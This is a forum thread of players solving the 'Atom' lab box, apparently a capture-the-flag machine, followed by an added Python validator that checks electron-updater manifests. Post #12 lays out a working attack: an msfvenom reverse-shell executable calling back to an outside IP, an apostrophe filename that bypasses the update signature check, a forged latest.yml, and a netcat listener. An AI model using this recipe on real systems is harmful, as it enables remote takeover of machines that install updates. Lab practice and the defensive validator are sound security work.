TUTORIAL Atom [Discussion]
by xicla - April 17, 2021 at 08:42 PM
#1
hi guys

ATOM user get from smb but can't do more than this i think

i decrypt .asar and nothing interesting

i think it's a BoF in the program
#2
I think you have to drop a fake update (reverse shell) in the smb share, and find a method to execute it
#3
i think there is hash check as well. :-|
#4
(April 17, 2021 at 09:54 PM)lingling40hrs Wrote: i think there is hash check as well. :-|

LOL what commands did y'all hit to get into SMB I can't get anywhere inside it
#5
use smbclient -N "\\\\ip-of-box\\Software_Updates"
#6
(April 17, 2021 at 10:12 PM)xploiter Wrote:
(April 17, 2021 at 09:54 PM)lingling40hrs Wrote: i think there is hash check as well. :-|

LOL what commands did y'all hit to get into SMB I can't get anywhere inside it

list the smb folders with:
smbclient -L //<<ip>>/ (press enter when asking for a pass)
then try anonymous login to the last listed folder:
smbclient //<<ip>>/Software_Updates -U ""
#7
(April 17, 2021 at 10:15 PM)sanakasa Wrote:
(April 17, 2021 at 10:12 PM)xploiter Wrote:
(April 17, 2021 at 09:54 PM)lingling40hrs Wrote: i think there is hash check as well. :-|

LOL what commands did y'all hit to get into SMB I can't get anywhere inside it

list the smb folders with:
smbclient -L //<<ip>>/ (press enter when asking for a pass)
then try anonymous login to the last listed folder:
smbclient //<<ip>>/Software_Updates -U ""

thanks, I did that. Guess what, I just found latest.yml inside /client2/, and then suddenly it was gone. It contained an encoded string:

o19abYhqcLJ9dceeMZ+5qHYIQhYHKuckLHdqBYBCru61TypaaYbUAql0un8Aeao1s7HovyCkcERLWEWL4Q2N7g==

weird that it's not base64
#8
Maybe it has something to do with electron builder auto updates

https://blog.doyensec.com/2020/02/24/ele...ypass.html
#9
(April 17, 2021 at 10:36 PM)ylifeqsa Wrote: Maybe it has something to do with electron builder auto updates

https://blog.doyensec.com/2020/02/24/ele...ypass.html

I've found this article and tried to put a powershell reverse shell one-liner instead of calc... no success so far. Will try harder
#10
looks like that url might work, tried doing the example to pop calc on a win vm with the command injection but no go
even tried with an exe with a ' in its name and a sha256 of the file and put the yml, and i didn't see the process kick off in procexplorer
#11
i've tried following the article but maybe i'm missing something. can anyone give a nudge?
#12
For getting USER:

Do the following:
1. msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.12.14.105 LPORT=1337 -f exe > "r'Shell.exe"
2. sha512sum r\'Shell.exe
3. Copy the sha512sum, go to cyberchef and select from hex, to base64, then copy that base64 encoded string to your yaml file to look like this:
version: 1.0.2
path: http://10.12.14.105/r'Shell.exe
sha512: C94F3x7tx5dDDhALW+XX1M6Klrg9e9J23gB8BYrw9S6INsqU4nWcwrVt1Pr976LsS906lFolZxPXTqgmLADtJQ==
4. Start python3 server
5. Start netcat listener
6. upload the latest.yml file to the smb share, to any of the client folders
7. Wait and pray for shell.
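As an added defender-side example (my code, not from the thread or from electron-builder), a small Python validator for a latest.yml of the shape posted above: it checks that the sha512 field is the base64 SHA-512 of the payload actually fetched, that the path uses https, and that the filename carries no quote or other shell metacharacter. The flat key/value parser, the https rule and the filename rule are my own assumptions about what a safe update pipeline should enforce, not a description of electron-updater's real checks.

```python
import base64
import hashlib
import hmac
import re
from urllib.parse import urlparse

# Filenames safe to hand to a downloader/installer: no quotes, spaces or shell metacharacters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*$")


def parse_manifest(text):
    """Minimal parser for the flat 'key: value' lines of a latest.yml (assumption: no nesting)."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"^([A-Za-z0-9_]+):\s*(.*?)\s*$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def make_manifest(version, path, data):
    """Build a manifest whose sha512 field is the base64 of the raw digest, as in the thread."""
    digest_b64 = base64.b64encode(hashlib.sha512(data).digest()).decode()
    return f"version: {version}\npath: {path}\nsha512: {digest_b64}\n"


def verify_update(manifest_text, data):
    """Return a list of findings; an empty list means manifest and payload pass every check."""
    findings = []
    fields = parse_manifest(manifest_text)
    url = urlparse(fields.get("path", ""))
    name = url.path.rsplit("/", 1)[-1]
    if url.scheme != "https":
        findings.append("path does not use https")
    if not SAFE_NAME.match(name):
        findings.append(f"unsafe filename in path: {name!r}")
    try:
        expected = base64.b64decode(fields.get("sha512", ""), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        expected = b""
    if len(expected) != hashlib.sha512().digest_size:
        findings.append("sha512 field is not a base64 SHA-512 digest")
    elif not hmac.compare_digest(hashlib.sha512(data).digest(), expected):
        findings.append("sha512 mismatch: payload differs from the manifest")
    return findings


# Constructed demo inputs (not a real installer and not the box's files).
GOOD_DATA = b"constructed installer bytes"
GOOD_YML = make_manifest("1.0.2", "https://updates.example.test/atom-1.0.2.exe", GOOD_DATA)
# Same shape as the manifest in post #12: quote in the filename, plain http, hash of a different file.
BAD_YML = make_manifest("1.0.2", "http://10.12.14.105/r'Shell.exe", b"some other payload")
```

Running `verify_update(GOOD_YML, GOOD_DATA)` returns an empty list, while `verify_update(BAD_YML, GOOD_DATA)` reports all three problems.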
